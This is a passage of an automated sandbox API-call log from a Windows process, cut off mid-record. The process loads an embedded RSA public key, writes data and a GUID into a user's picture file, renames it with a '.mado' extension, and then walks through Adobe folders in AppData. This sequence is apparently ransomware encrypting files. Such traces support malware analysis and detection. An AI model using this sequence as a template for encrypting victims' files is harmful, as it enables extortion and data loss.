[0207.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.203] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0207.204] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0207.204] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0207.204] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0207.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0207.204] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0207.204] GetLastError () returned 0x0 [0207.204] CryptDestroyHash (hHash=0x32ef238) returned 1 [0207.204] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0207.204] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0207.204] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0207.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.204] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0207.204] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0207.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b86698 [0207.205] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x2ffd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.205] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0207.205] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0207.205] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0207.205] CloseHandle (hObject=0x63c) returned 1 [0207.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf0) returned 0x32b69d8 [0207.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x900) returned 0x3b7b950 [0207.206] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\NDgMcqKGv.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\ndgmcqkgv.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\NDgMcqKGv.gif.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\ndgmcqkgv.gif.mado")) returned 1 [0207.207] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x394cc5f0, ftCreationTime.dwHighDateTime=0x1d5da71, ftLastAccessTime.dwLowDateTime=0x793b12f0, ftLastAccessTime.dwHighDateTime=0x1d5e6a3, ftLastWriteTime.dwLowDateTime=0x793b12f0, ftLastWriteTime.dwHighDateTime=0x1d5e6a3, nFileSizeHigh=0x0, nFileSizeLow=0x2ffd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NDgMcqKGv.gif", cAlternateFileName="NDGMCQ~1.GIF")) returned 0 [0207.208] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292de0 | out: hHeap=0x2c0000) returned 1 [0207.208] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeec8 | out: hHeap=0x2c0000) returned 1 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77e70 | out: hHeap=0x2c0000) returned 1 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77db8 | out: hHeap=0x2c0000) returned 1 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b78098 | out: hHeap=0x2c0000) returned 1 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321738 | out: hHeap=0x2c0000) returned 1 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeff8 | out: hHeap=0x2c0000) returned 1 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292f90 | out: hHeap=0x2c0000) returned 1 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3294350 | out: hHeap=0x2c0000) returned 1 [0207.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0207.208] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0207.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0207.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0207.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0207.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\") returned="Search\\" [0207.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0207.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0207.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.213] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.213] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.213] PathFindFileNameW (pszPath="") returned="" [0207.213] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.214] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.214] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.214] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0207.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0207.215] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.215] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0207.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0207.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0207.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.215] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.215] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.215] PathFindFileNameW (pszPath="") returned="" [0207.215] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, 